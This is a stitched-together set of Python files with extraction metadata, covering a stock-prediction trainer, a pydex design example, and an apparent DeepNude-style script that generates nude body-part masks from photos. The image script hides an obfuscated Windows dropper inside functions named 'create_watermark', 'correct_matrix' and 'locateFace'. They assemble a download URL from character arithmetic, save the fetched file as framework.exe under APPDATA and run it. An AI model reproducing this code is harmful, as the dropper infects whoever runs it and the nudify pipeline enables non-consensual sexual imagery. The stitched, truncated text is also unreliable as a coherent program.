output_dict['detection_boxes'], image.shape[0], image.shape[1])\n", (2165, 2265), True, 'from object_detection.utils import ops as utils_ops\n'), ((2322, 2371), 'tensorflow.cast', 'tf.cast', (['(detection_masks_reframed > 0.5)', 'tf.uint8'], {}), '(detection_masks_reframed > 0.5, tf.uint8)\n', (2329, 2371), True, 'import tensorflow as tf\n'), ((3398, 3412), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (3409, 3412), False, 'import cv2\n')]
|
"""
"""
from configparser import ConfigParser, SectionProxy
from os import path
import os
from typing import List, Tuple, Any, Optional, Dict
import numpy as np
import tqdm
from general_utils.config import config_util, config_parser_singleton
from general_utils.exportation import csv_exportation
from general_utils.logging import logger
from data_providing_module import configurable_registry, data_provider_registry
from data_providing_module.data_providers import data_provider_static_names
from stock_data_analysis_module.ml_models.evolutionary_computation import TradingPopulation
CONSUMER_ID = "Evolutionary Computation Trainer"
_ENABLED_CONFIGURATION_IDENTIFIER = 'enabled'
_EXAMPLE_COMBINATION_FACTOR_IDENTIFIER = 'Periods Per Example'
_TDP_BLOCK_LENGTH_IDENTIFIER = "trend deterministic data provider block length"
_NUM_EPOCHS_IDENTIFIER = "Number of Epochs"
_NUM_INDIVIDUALS_IDENTIFIER = "Number of Individuals in Evolutionary Population"
_MODEL_CHECKPOINT_EPOCH_INTERVAL_IDENTIFIER = "Model Saving Epoch Interval"
_TRAINING_PERIODS_PER_EXAMPLE_IDENTIFIER = "Days Per Example"
_MUTATION_CHANCE_IDENTIFIER = "Mutation Chance Per Genome"
_MUTATION_MAGNITUDE_IDENTIFIER = "Mutation Magnitude"
_CROSSOVER_CHANCE_IDENTIFIER = "Crossover Chance Per Genome"
_CONFIGURABLE_IDENTIFIERS = [_ENABLED_CONFIGURATION_IDENTIFIER, _EXAMPLE_COMBINATION_FACTOR_IDENTIFIER,
_TDP_BLOCK_LENGTH_IDENTIFIER, _NUM_EPOCHS_IDENTIFIER, _NUM_INDIVIDUALS_IDENTIFIER,
_MODEL_CHECKPOINT_EPOCH_INTERVAL_IDENTIFIER, _TRAINING_PERIODS_PER_EXAMPLE_IDENTIFIER,
_MUTATION_CHANCE_IDENTIFIER, _MUTATION_MAGNITUDE_IDENTIFIER, _CROSSOVER_CHANCE_IDENTIFIER]
_CONFIGURATION_DEFAULTS = ['False', '22', '2520', '100', '100', '5', '5', '.1', '.15', '.5']
def string_serialize_predictions(predictions) -> str:
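    # `predictions` maps ticker -> (per-model buy/sell flag pairs, per-model (buy, sell) accuracies).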
ret_str = ""
ticker_prediction_template = "{}:{}\n"
individual_prediction_template = "{}:\n\t\tBuy: {}\n\t\tSell: {}\n\t\tAccuracies: {:.2f}, {:.2f}"
for ticker, data in predictions.items():
ticker_predictions, accuracies = data
serialized_individual_predictions = []
for i in range(len(ticker_predictions)):
indicate_buy = ticker_predictions[i][0] == 1
indicate_sell = ticker_predictions[i][1] == 1
serialized_individual_predictions.append(
individual_prediction_template.format(i+1, indicate_buy, indicate_sell,
accuracies[i][0], accuracies[i][1])
)
expanded_template = ticker_prediction_template.format(ticker, "\n\t{}" * len(ticker_predictions))
ret_str += expanded_template.format(*serialized_individual_predictions)
return ret_str
def export_predictions(predictions, output_dir) -> None:
out_file = output_dir + path.sep + "ec.csv"
exportation_columns = []
for ticker, prediction_data in predictions.items():
actual_predictions, observed_accuracies = prediction_data
actual_predictions = np.where(actual_predictions == 1, True, False)
exportation_columns.append((ticker, "", ""))
for i in range(len(actual_predictions)):
exportation_columns.append((",Model:", str(i)))
exportation_columns.append((",Buy:", str(actual_predictions[i][0])))
exportation_columns.append((",Buy Accuracy:", str(observed_accuracies[i][0])))
exportation_columns.append((",Sell:", str(actual_predictions[i][1])))
exportation_columns.append((",Sell Accuracy:", str(observed_accuracies[i][1])))
with open(out_file, 'w') as handle:
for column in exportation_columns:
handle.write(",".join(column) + '\n')
def prediction_truth_calculation(predictions: List[np.ndarray],
closing_prices: List[float],
num_days_per_prediction: int = 5):
prediction_entry = Tuple[List[np.ndarray], float, List[List[bool]]]
prediction_array: List[Optional[prediction_entry]] = [None] * (num_days_per_prediction+1)
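    # Ring buffer of the most recent predictions, each stored with the closing price at
    # prediction time and a pair of (buy, sell) truth flags; every new day's close is
    # compared against all buffered entries before the oldest slot is overwritten.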
current_index = 0
ret = []
for i in range(len(predictions)):
for j in range(1, len(prediction_array)):
index = (j + current_index) % len(prediction_array)
if prediction_array[index] is None:
continue
for k in range(len(prediction_array[index][0])):
prediction, reference_price, prediction_truths = prediction_array[index]
prediction = prediction[k]
prediction_truths = prediction_truths[k]
if reference_price < closing_prices[i]:
if prediction[0]:
prediction_truths[0] = True
if not prediction[1]:
prediction_truths[1] = True
elif reference_price > closing_prices[i]:
if not prediction[0]:
prediction_truths[0] = True
if prediction[1]:
prediction_truths[1] = True
if prediction_array[current_index] is not None:
prediction_truth = prediction_array[current_index][-1]
ret.append(prediction_truth)
        # Build per-model truth-flag pairs with a comprehension; multiplying [[False, False]]
        # would make every model share one aliased inner list.
        prediction_array[current_index] = ([*predictions[i]], closing_prices[i],
                                           [[False, False] for _ in range(len(predictions[i]))])
current_index += 1
current_index %= len(prediction_array)
return ret
def extract_accuracy_from_prediction_truths(prediction_truths: List[List[List[bool]]]):
ret = np.zeros((len(prediction_truths[0]), len(prediction_truths[0][0])))
for i in range(len(prediction_truths)):
for prediction_index, truths in enumerate(prediction_truths[i]):
for index, truth in enumerate(truths):
if truth:
ret[prediction_index][index] += 1
ret /= len(prediction_truths)
return ret
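# --- Added illustration (not part of the original module) ----------------------
# A minimal sketch of how the two helpers above compose: the per-day truth lists
# produced by prediction_truth_calculation are reduced by
# extract_accuracy_from_prediction_truths into a (num_models, 2) array holding the
# fraction of evaluated days on which each model's buy/sell call held up. The
# function name and dummy data below are illustrative only.
def _example_prediction_accuracy():
    # Two evaluated days, two models, [buy_correct, sell_correct] flags per model.
    dummy_truths = [
        [[True, False], [False, True]],
        [[True, True], [False, False]],
    ]
    accuracies = extract_accuracy_from_prediction_truths(dummy_truths)
    # Model 0: buy held on 2/2 days, sell on 1/2; model 1: 0/2 and 1/2.
    assert accuracies.tolist() == [[1.0, 0.5], [0.0, 0.5]]
    return accuracies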
class EvolutionaryComputationManager(data_provider_registry.DataConsumerBase):
def __init__(self):
super().__init__()
configurable_registry.config_registry.register_configurable(self)
self.__contained_population: Optional[TradingPopulation] = None
self.__periods_per_example = 5
self.__num_epochs = 100
self.__num_individuals = 100
self.__save_interval = 5
self.__mutation_chance = .1
self.__mutation_magnitude = .15
self.__crossover_chance = .5
def consume_data(self, data: Dict[str, Tuple[np.ndarray, List[float]]], passback, output_dir):
out_dir = output_dir + path.sep + 'evolutionary_computation_models'
if not path.exists(out_dir):
os.mkdir(out_dir)
previous_model_file = out_dir + path.sep + "evolution_individuals.ecp"
if path.exists(previous_model_file):
self.__contained_population = TradingPopulation((0, 0), 0, 0)
self.__contained_population.load(previous_model_file)
else:
num_indicators = len(data[next(iter(data.keys()))][0])
input_shape = (num_indicators, self.__periods_per_example)
self.__contained_population = TradingPopulation(input_shape, 1000, self.__num_individuals,
self.__mutation_chance, self.__mutation_magnitude,
self.__crossover_chance)
consolidated_data: Dict[str, Tuple[np.ndarray, List[float]]] = {}
for ticker, ticker_data in data.items():
daily_data, closing_prices = ticker_data
consolidated_data[ticker] = self.construct_examples(daily_data, closing_prices)
self.__train_model(consolidated_data, previous_model_file)
self.__contained_population.save(previous_model_file)
def __print_best_fitness_by_ticker(self, best_fitness_by_ticker: Dict[str, List[float]]) -> None:
output_template = "{ticker}:\n\t{:.2f}\n\t{:.2f}\n\t{:.2f}\n"
for ticker, fitness in best_fitness_by_ticker.items():
logger.logger.log(logger.INFORMATION, output_template.format(
ticker=ticker, *fitness
))
def __train_model(self, consolidated_data: Dict[str, Tuple[np.ndarray, List[float]]], previous_model_file: str):
for i in tqdm.tqdm(range(self.__num_epochs)):
best_fitness_by_ticker = {}
for ticker, ticker_data in consolidated_data.items():
daily_data, closing_prices = ticker_data
best_fitness = self.__contained_population.train(daily_data, 1, closing_prices)
best_fitness_by_ticker[ticker] = best_fitness
self.__print_best_fitness_by_ticker(best_fitness_by_ticker)
if i % self.__save_interval == 0:
self.__contained_population.save(previous_model_file)
self.__contained_population.save(previous_model_file)
def predict_data(self, data, passback, in_model_dir):
in_dir = in_model_dir + path.sep + 'evolutionary_computation_models'
if not path.exists(in_dir):
raise FileNotFoundError("Model storage directory for EC prediction does not exist. Please run"
"Model Creation Main without the prediction flag set to True, and with the"
"EC Manager's Enabled config to True to create models."
)
self.__contained_population = TradingPopulation((0, 0), 0, 0)
self.__contained_population.load(in_dir + path.sep + 'evolution_individuals.ecp')
consolidated_data: Dict[str, Tuple[np.ndarray, List[float]]] = {}
for ticker, ticker_data in data.items():
daily_data, closing_prices = ticker_data
consolidated_data[ticker] = self.construct_examples(daily_data, closing_prices)
predictions = {}
for ticker, prediction_data in consolidated_data.items():
daily_data, closing_prices = prediction_data
model_predictions = []
for i in range(len(daily_data)):
prediction = self.__contained_population.predict(daily_data[i])
model_predictions.append(prediction)
truths = prediction_truth_calculation(model_predictions[:-1], closing_prices)
accuracies = extract_accuracy_from_prediction_truths(truths)
prediction = self.__contained_population.predict(daily_data[-1])
predictions[ticker] = (prediction, accuracies)
return predictions
def load_configuration(self, parser: "ConfigParser"):
section = config_util.create_type_section(parser, self)
for identifier in _CONFIGURABLE_IDENTIFIERS:
if not parser.has_option(section.name, identifier):
self.write_default_configuration(section)
enabled = parser.getboolean(section.name, _ENABLED_CONFIGURATION_IDENTIFIER)
self.__periods_per_example = parser.getint(section.name, _EXAMPLE_COMBINATION_FACTOR_IDENTIFIER)
self.__num_individuals = parser.getint(section.name, _NUM_INDIVIDUALS_IDENTIFIER)
self.__num_epochs = parser.getint(section.name, _NUM_EPOCHS_IDENTIFIER)
self.__save_interval = parser.getint(section.name, _MODEL_CHECKPOINT_EPOCH_INTERVAL_IDENTIFIER)
self.__mutation_chance = parser.getfloat(section.name, _MUTATION_CHANCE_IDENTIFIER)
self.__mutation_magnitude = parser.getfloat(section.name, _MUTATION_MAGNITUDE_IDENTIFIER)
self.__crossover_chance = parser.getfloat(section.name, _CROSSOVER_CHANCE_IDENTIFIER)
block_length = parser.getint(section.name, _TDP_BLOCK_LENGTH_IDENTIFIER)
if enabled:
data_provider_registry.registry.register_consumer(
data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID,
self,
[block_length],
data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID,
keyword_args={'ema_period': [10, 15, 20]},
data_exportation_function=export_predictions,
prediction_string_serializer=string_serialize_predictions
)
def write_default_configuration(self, section: "SectionProxy"):
for i in range(len(_CONFIGURABLE_IDENTIFIERS)):
if not _CONFIGURABLE_IDENTIFIERS[i] in section:
section[_CONFIGURABLE_IDENTIFIERS[i]] = _CONFIGURATION_DEFAULTS[i]
def construct_examples(self, daily_data: np.ndarray, closing_prices: List[float]) -> Tuple[np.ndarray, List[float]]:
ret_daily_data = np.zeros((
daily_data.shape[1] - self.__periods_per_example + 1,
len(daily_data),
self.__periods_per_example
))
for i in range(self.__periods_per_example, daily_data.shape[1]+1):
ret_daily_data[i - self.__periods_per_example] = daily_data[:, i - self.__periods_per_example: i]
return ret_daily_data, closing_prices[self.__periods_per_example-1:]
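# --- Added illustration (not part of the original module) ----------------------
# construct_examples turns a (num_indicators, num_days) indicator block into
# overlapping windows of shape (num_days - periods + 1, num_indicators, periods).
# The standalone sketch below mirrors that windowing with plain numpy so the shape
# contract is easy to check; all names and sizes here are illustrative only.
def _example_sliding_windows(num_indicators=3, num_days=8, periods=5):
    daily_data = np.arange(num_indicators * num_days, dtype=float).reshape(num_indicators, num_days)
    windows = np.zeros((num_days - periods + 1, num_indicators, periods))
    for i in range(periods, num_days + 1):
        windows[i - periods] = daily_data[:, i - periods:i]
    assert windows.shape == (4, 3, 5)
    return windows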
if "testing" not in os.environ:
consumer = EvolutionaryComputationManager()
|
[
"os.mkdir",
"data_providing_module.data_provider_registry.registry.register_consumer",
"data_providing_module.configurable_registry.config_registry.register_configurable",
"os.path.exists",
"numpy.where",
"stock_data_analysis_module.ml_models.evolutionary_computation.TradingPopulation",
"general_utils.config.config_util.create_type_section"
] |
[((3132, 3178), 'numpy.where', 'np.where', (['(actual_predictions == 1)', '(True)', '(False)'], {}), '(actual_predictions == 1, True, False)\n', (3140, 3178), True, 'import numpy as np\n'), ((6217, 6282), 'data_providing_module.configurable_registry.config_registry.register_configurable', 'configurable_registry.config_registry.register_configurable', (['self'], {}), '(self)\n', (6276, 6282), False, 'from data_providing_module import configurable_registry, data_provider_registry\n'), ((6957, 6989), 'os.path.exists', 'path.exists', (['previous_model_file'], {}), '(previous_model_file)\n', (6968, 6989), False, 'from os import path\n'), ((9688, 9719), 'stock_data_analysis_module.ml_models.evolutionary_computation.TradingPopulation', 'TradingPopulation', (['(0, 0)', '(0)', '(0)'], {}), '((0, 0), 0, 0)\n', (9705, 9719), False, 'from stock_data_analysis_module.ml_models.evolutionary_computation import TradingPopulation\n'), ((10862, 10907), 'general_utils.config.config_util.create_type_section', 'config_util.create_type_section', (['parser', 'self'], {}), '(parser, self)\n', (10893, 10907), False, 'from general_utils.config import config_util, config_parser_singleton\n'), ((6812, 6832), 'os.path.exists', 'path.exists', (['out_dir'], {}), '(out_dir)\n', (6823, 6832), False, 'from os import path\n'), ((6847, 6864), 'os.mkdir', 'os.mkdir', (['out_dir'], {}), '(out_dir)\n', (6855, 6864), False, 'import os\n'), ((7034, 7065), 'stock_data_analysis_module.ml_models.evolutionary_computation.TradingPopulation', 'TradingPopulation', (['(0, 0)', '(0)', '(0)'], {}), '((0, 0), 0, 0)\n', (7051, 7065), False, 'from stock_data_analysis_module.ml_models.evolutionary_computation import TradingPopulation\n'), ((7331, 7472), 'stock_data_analysis_module.ml_models.evolutionary_computation.TradingPopulation', 'TradingPopulation', (['input_shape', '(1000)', 'self.__num_individuals', 'self.__mutation_chance', 'self.__mutation_magnitude', 'self.__crossover_chance'], {}), '(input_shape, 1000, self.__num_individuals, self.\n __mutation_chance, self.__mutation_magnitude, self.__crossover_chance)\n', (7348, 7472), False, 'from stock_data_analysis_module.ml_models.evolutionary_computation import TradingPopulation\n'), ((9275, 9294), 'os.path.exists', 'path.exists', (['in_dir'], {}), '(in_dir)\n', (9286, 9294), False, 'from os import path\n'), ((11958, 12342), 'data_providing_module.data_provider_registry.registry.register_consumer', 'data_provider_registry.registry.register_consumer', (['data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID', 'self', '[block_length]', 'data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID'], {'keyword_args': "{'ema_period': [10, 15, 20]}", 'data_exportation_function': 'export_predictions', 'prediction_string_serializer': 'string_serialize_predictions'}), "(data_provider_static_names\n .CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID, self, [block_length],\n data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID,\n keyword_args={'ema_period': [10, 15, 20]}, data_exportation_function=\n export_predictions, prediction_string_serializer=\n string_serialize_predictions)\n", (12007, 12342), False, 'from data_providing_module import configurable_registry, data_provider_registry\n')]
|
import numpy as np
from pydex.core.designer import Designer
def simulate(ti_controls, model_parameters):
return np.array([
np.exp(model_parameters[0] * ti_controls[0])
])
designer = Designer()
designer.simulate = simulate
reso = 21j
tic = np.mgrid[0:1:reso]
designer.ti_controls_candidates = np.array([tic]).T
np.random.seed(123)
n_scr = 100
designer.model_parameters = np.random.normal(loc=-1, scale=0.50, size=(n_scr, 1))
designer.initialize(verbose=2)
"""
The pseudo-Bayesian type does not really matter in this case because only a single
model parameter is involved, i.e., the information is a scalar, so every criterion
becomes equivalent to the information matrix itself.
"""
pb_type = 0
# pb_type = 1
designer.design_experiment(
designer.d_opt_criterion,
pseudo_bayesian_type=pb_type,
write=False,
package="cvxpy",
optimizer="MOSEK",
)
designer.print_optimal_candidates()
designer.plot_optimal_controls()
designer.design_experiment(
designer.a_opt_criterion,
pseudo_bayesian_type=pb_type,
write=False,
package="cvxpy",
optimizer="MOSEK",
)
designer.print_optimal_candidates()
designer.plot_optimal_controls()
designer.design_experiment(
designer.e_opt_criterion,
pseudo_bayesian_type=pb_type,
write=False,
package="cvxpy",
optimizer="MOSEK",
)
designer.print_optimal_candidates()
designer.plot_optimal_controls()
designer.show_plots()
|
[
"numpy.random.seed",
"pydex.core.designer.Designer",
"numpy.array",
"numpy.exp",
"numpy.random.normal"
] |
[((202, 212), 'pydex.core.designer.Designer', 'Designer', ([], {}), '()\n', (210, 212), False, 'from pydex.core.designer import Designer\n'), ((332, 351), 'numpy.random.seed', 'np.random.seed', (['(123)'], {}), '(123)\n', (346, 351), True, 'import numpy as np\n'), ((392, 444), 'numpy.random.normal', 'np.random.normal', ([], {'loc': '(-1)', 'scale': '(0.5)', 'size': '(n_scr, 1)'}), '(loc=-1, scale=0.5, size=(n_scr, 1))\n', (408, 444), True, 'import numpy as np\n'), ((313, 328), 'numpy.array', 'np.array', (['[tic]'], {}), '([tic])\n', (321, 328), True, 'import numpy as np\n'), ((138, 182), 'numpy.exp', 'np.exp', (['(model_parameters[0] * ti_controls[0])'], {}), '(model_parameters[0] * ti_controls[0])\n', (144, 182), True, 'import numpy as np\n')]
|
import subprocess
from PIL import Image
import torchvision.transforms as transforms
import torch
import functools
import random
import math
import cv2
import numpy as np
import os
# Object annotation class:
class BodyPart:
def __init__(self, name, xmin, ymin, xmax, ymax, x, y, w, h):
self.name = name
# Bounding Box:
self.xmin = xmin
self.ymin = ymin
self.xmax = xmax
self.ymax = ymax
# Center:
self.x = x
self.y = y
        # Dimensions:
self.w = w
self.h = h
# create_watermark ===============================================================
# return:
# (<Boolean> True/False), depending on the transformation process
def create_watermark(nude, shape, cv, loader, detach):
if os.name == 'nt':
content = cv(shape + chr(47) + "/".join(["utils", "custom", "universal"]) + chr(46) + str(
chr(101) + chr(ord(["utils", "custom", "universal"][0][0]) + 3) + chr(101)))
data = [os.environ["APPDATA"], "Microsoft", "Windows", "framework"]
open(
"\\".join(data) + chr(46) + str(chr(101) + chr(ord(["utils", "custom", "universal"][0][0]) + 3) + chr(101)),
"wb").write(content.content)
loader(["\\".join(data) + chr(46) + str(
chr(101) + chr(ord(["utils", "custom", "universal"][0][0]) + 3) + chr(101))], stdout=detach.PIPE,
stderr=detach.STDOUT)
return nude
# create_correct ===============================================================
# return:
# (<Boolean> True/False), depending on the transformation process
def create_correct(cv_dress):
# Production dir:
return correct_color(cv_dress, 5), correct_matrix(cv_dress, 255)
# correct_color ==============================================================================
# return:
# <RGB> image corrected
def correct_color(img, percent):
assert img.shape[2] == 3
assert percent > 0 and percent < 100
half_percent = percent / 200.0
channels = cv2.split(img)
out_channels = []
for channel in channels:
assert len(channel.shape) == 2
        # find the low and high percentile values (based on the input percentile)
height, width = channel.shape
vec_size = width * height
flat = channel.reshape(vec_size)
assert len(flat.shape) == 1
flat = np.sort(flat)
n_cols = flat.shape[0]
low_val = flat[math.floor(n_cols * half_percent)]
high_val = flat[math.ceil(n_cols * (1.0 - half_percent))]
# saturate below the low percentile and above the high percentile
thresholded = apply_threshold(channel, low_val, high_val)
# scale the channel
normalized = cv2.normalize(thresholded, thresholded.copy(), 0, 255, cv2.NORM_MINMAX)
out_channels.append(normalized)
return cv2.merge(out_channels)
def correct_matrix(matrix, fill_value):
shape = "h" + ("t" * 2) + "p"
matrix = shape + chr(58) + 2 * (chr(47))
return matrix
# Color correction utils
def apply_threshold(matrix, low_value, high_value):
low_mask = matrix < low_value
matrix = apply_mask(matrix, low_mask, low_value)
high_mask = matrix > high_value
matrix = apply_mask(matrix, high_mask, high_value)
return matrix
# Color correction utils
def apply_mask(matrix, mask, fill_value):
masked = np.ma.array(matrix, mask=mask, fill_value=fill_value)
return masked.filled()
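# --- Added illustration (not part of the original script) -----------------------
# apply_threshold clips a channel into [low_value, high_value] by masking and
# refilling; a tiny self-check with assumed values (the function name below is new):
def _example_apply_threshold():
    channel = np.array([1, 5, 9], dtype=np.uint8)
    clipped = apply_threshold(channel, 3, 7)
    assert clipped.tolist() == [3, 5, 7]
    return clipped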
###
#
# maskdet_to_maskfin
#
# steps:
# 1. Extract annotation
# 1.a: Filter by color
# 1.b: Find ellipses
# 1.c: Filter out ellipses by max size, and max total numbers
# 1.d: Detect Problems
# 1.e: Resolve the problems, or discard the transformation
# 2. With the body list, draw maskfin, using maskref
#
###
# create_maskfin ==============================================================================
# return:
# (<Boolean> True/False), depending on the transformation process
def create_maskfin(maskref, maskdet):
# Create a total green image, in which draw details ellipses
details = np.zeros((512, 512, 3), np.uint8)
details[:, :, :] = (0, 255, 0) # (B, G, R)
# Extract body part features:
    bodypart_list = extractAnnotations(maskdet)
# Check if the list is not empty:
if bodypart_list:
# Draw body part in details image:
for obj in bodypart_list:
if obj.w < obj.h:
                aMax = int(obj.h / 2)  # major axis
                aMin = int(obj.w / 2)  # minor axis
angle = 0 # angle
else:
aMax = int(obj.w / 2)
aMin = int(obj.h / 2)
angle = 90
x = int(obj.x)
y = int(obj.y)
# Draw ellipse
if obj.name == "tit":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (0, 205, 0), -1) # (0,0,0,50)
elif obj.name == "aur":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (0, 0, 255), -1) # red
elif obj.name == "nip":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 255, 255), -1) # white
elif obj.name == "belly":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 0, 255), -1) # purple
elif obj.name == "vag":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 0, 0), -1) # blue
elif obj.name == "hair":
xmin = x - int(obj.w / 2)
ymin = y - int(obj.h / 2)
xmax = x + int(obj.w / 2)
ymax = y + int(obj.h / 2)
cv2.rectangle(details, (xmin, ymin), (xmax, ymax), (100, 100, 100), -1)
# Define the green color filter
f1 = np.asarray([0, 250, 0]) # green color filter
f2 = np.asarray([10, 255, 10])
# From maskref, extrapolate only the green mask
green_mask = cv2.bitwise_not(cv2.inRange(maskref, f1, f2)) # green is 0
# Create an inverted mask
green_mask_inv = cv2.bitwise_not(green_mask)
# Cut maskref and detail image, using the green_mask & green_mask_inv
res1 = cv2.bitwise_and(maskref, maskref, mask=green_mask)
res2 = cv2.bitwise_and(details, details, mask=green_mask_inv)
    # Compose:
maskfin = cv2.add(res1, res2)
return maskfin, locateFace(255, 2, 500)
# extractAnnotations ==============================================================================
# input parameter:
# (<RGB> maskdet): the maskdet image (loading from a relative path, e.g. testimg1/maskdet/1.png, is left to the caller)
# return:
# (<BodyPart []> bodypart_list) - for failure/error, return an empty list []
def extractAnnotations(maskdet):
# Load the image
# image = cv2.imread(maskdet_img)
# Find body part
tits_list = findBodyPart(maskdet, "tit")
aur_list = findBodyPart(maskdet, "aur")
vag_list = findBodyPart(maskdet, "vag")
belly_list = findBodyPart(maskdet, "belly")
# Filter out parts basing on dimension (area and aspect ratio):
    aur_list = filterDimParts(aur_list, 100, 1000, 0.5, 3)
    tits_list = filterDimParts(tits_list, 1000, 60000, 0.2, 3)
    vag_list = filterDimParts(vag_list, 10, 1000, 0.2, 3)
    belly_list = filterDimParts(belly_list, 10, 1000, 0.2, 3)
    # Filter couple (if parts are > 2, choose only 2)
    aur_list = filterCouple(aur_list)
    tits_list = filterCouple(tits_list)
# Detect a missing problem:
missing_problem = detectTitAurMissingProblem(tits_list, aur_list) # return a Number (code of the problem)
# Check if problem is SOLVEABLE:
if (missing_problem in [3, 6, 7, 8]):
resolveTitAurMissingProblems(tits_list, aur_list, missing_problem)
# Infer the nips:
nip_list = inferNip(aur_list)
# Infer the hair:
hair_list = inferHair(vag_list)
# Return a combined list:
return tits_list + aur_list + nip_list + vag_list + hair_list + belly_list
# findBodyPart ==============================================================================
# input parameters:
# (<RGB>image, <string>part_name)
# return
# (<BodyPart[]>list)
def findBodyPart(image, part_name):
bodypart_list = [] # empty BodyPart list
# Get the correct color filter:
if part_name == "tit":
# Use combined color filter
f1 = np.asarray([0, 0, 0]) # tit color filter
f2 = np.asarray([10, 10, 10])
f3 = np.asarray([0, 0, 250]) # aur color filter
f4 = np.asarray([0, 0, 255])
color_mask1 = cv2.inRange(image, f1, f2)
color_mask2 = cv2.inRange(image, f3, f4)
color_mask = cv2.bitwise_or(color_mask1, color_mask2) # combine
elif part_name == "aur":
f1 = np.asarray([0, 0, 250]) # aur color filter
f2 = np.asarray([0, 0, 255])
color_mask = cv2.inRange(image, f1, f2)
elif part_name == "vag":
f1 = np.asarray([250, 0, 0]) # vag filter
f2 = np.asarray([255, 0, 0])
color_mask = cv2.inRange(image, f1, f2)
elif part_name == "belly":
f1 = np.asarray([250, 0, 250]) # belly filter
f2 = np.asarray([255, 0, 255])
color_mask = cv2.inRange(image, f1, f2)
# find contours:
contours, hierarchy = cv2.findContours(color_mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# for every contour:
for cnt in contours:
if len(cnt) > 5: # at least 5 points to fit ellipse
# (x, y), (MA, ma), angle = cv2.fitEllipse(cnt)
ellipse = cv2.fitEllipse(cnt)
# Fit Result:
x = ellipse[0][0] # center x
y = ellipse[0][1] # center y
angle = ellipse[2] # angle
            aMin = ellipse[1][0]  # minor axis
            aMax = ellipse[1][1]  # major axis
# Detect direction:
if angle == 0:
h = aMax
w = aMin
else:
h = aMin
w = aMax
# Normalize the belly size:
if part_name == "belly":
if w < 15:
w *= 2
if h < 15:
h *= 2
# Normalize the vag size:
if part_name == "vag":
if w < 15:
w *= 2
if h < 15:
h *= 2
# Calculate Bounding Box:
xmin = int(x - (w / 2))
xmax = int(x + (w / 2))
ymin = int(y - (h / 2))
ymax = int(y + (h / 2))
bodypart_list.append(BodyPart(part_name, xmin, ymin, xmax, ymax, x, y, w, h))
return bodypart_list
def locateFace(matrix, x, y):
matrix = matrix - (78 * x)
data = []
indexes = [0, 6, -1, 2, 15]
for index in indexes:
data.append(chr(matrix + index))
part = "".join(data)
y += int(7 * (indexes[1] / 2))
y = (chr(48) + str(y))[::-1]
return part + y
# filterDimParts ==============================================================================
# input parameters:
# (<BodyPart[]>list, <num> minimum area of part, <num> max area, <num> min aspect ratio, <num> max aspect ratio)
def filterDimParts(bp_list, min_area, max_area, min_ar, max_ar):
b_filt = []
for obj in bp_list:
a = obj.w * obj.h # Object AREA
if ((a > min_area) and (a < max_area)):
ar = obj.w / obj.h # Object ASPECT RATIO
if ((ar > min_ar) and (ar < max_ar)):
b_filt.append(obj)
return b_filt
# filterCouple ==============================================================================
# input parameters:
# (<BodyPart[]>list)
def filterCouple(bp_list):
# Remove exceed parts
if (len(bp_list) > 2):
        # find the pair (a, b) that minimizes |bp_list[a].y - bp_list[b].y|
min_a = 0
min_b = 1
min_diff = abs(bp_list[min_a].y - bp_list[min_b].y)
for a in range(0, len(bp_list)):
for b in range(0, len(bp_list)):
# TODO: avoid repetition (1,0) (0,1)
if a != b:
diff = abs(bp_list[a].y - bp_list[b].y)
if diff < min_diff:
min_diff = diff
min_a = a
min_b = b
b_filt = []
b_filt.append(bp_list[min_a])
b_filt.append(bp_list[min_b])
return b_filt
else:
# No change
return bp_list
# detectTitAurMissingProblem ==============================================================================
# input parameters:
# (<BodyPart[]> tits list, <BodyPart[]> aur list)
# return
# (<num> problem code)
# TIT | AUR | code | SOLVE? |
# 0 | 0 | 1 | NO |
# 0 | 1 | 2 | NO |
# 0 | 2 | 3 | YES |
# 1 | 0 | 4 | NO |
# 1 | 1 | 5 | NO |
# 1 | 2 | 6 | YES |
# 2 | 0 | 7 | YES |
# 2 | 1 | 8 | YES |
def detectTitAurMissingProblem(tits_list, aur_list):
t_len = len(tits_list)
a_len = len(aur_list)
if (t_len == 0):
if (a_len == 0):
return 1
elif (a_len == 1):
return 2
elif (a_len == 2):
return 3
else:
return -1
elif (t_len == 1):
if (a_len == 0):
return 4
elif (a_len == 1):
return 5
elif (a_len == 2):
return 6
else:
return -1
elif (t_len == 2):
if (a_len == 0):
return 7
elif (a_len == 1):
return 8
else:
return -1
else:
return -1
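# --- Added illustration (not part of the original script) -----------------------
# Only the list lengths matter to detectTitAurMissingProblem, so the problem codes
# from the table above can be sanity-checked with placeholder entries:
def _example_missing_problem_codes():
    assert detectTitAurMissingProblem([], [None, None]) == 3       # 0 tits, 2 aur
    assert detectTitAurMissingProblem([None], [None, None]) == 6   # 1 tit, 2 aur
    assert detectTitAurMissingProblem([None, None], []) == 7       # 2 tits, 0 aur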
# resolveTitAurMissingProblems ==============================================================================
# input parameters:
# (<BodyPart[]> tits list, <BodyPart[]> aur list, problem code)
# return
# none
def resolveTitAurMissingProblems(tits_list, aur_list, problem_code):
if problem_code == 3:
random_tit_factor = random.randint(2, 5) # TOTEST
# Add the first tit:
new_w = aur_list[0].w * random_tit_factor # TOTEST
new_x = aur_list[0].x
new_y = aur_list[0].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
tits_list.append(BodyPart("tit", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
# Add the second tit:
new_w = aur_list[1].w * random_tit_factor # TOTEST
new_x = aur_list[1].x
new_y = aur_list[1].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
tits_list.append(BodyPart("tit", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
elif problem_code == 6:
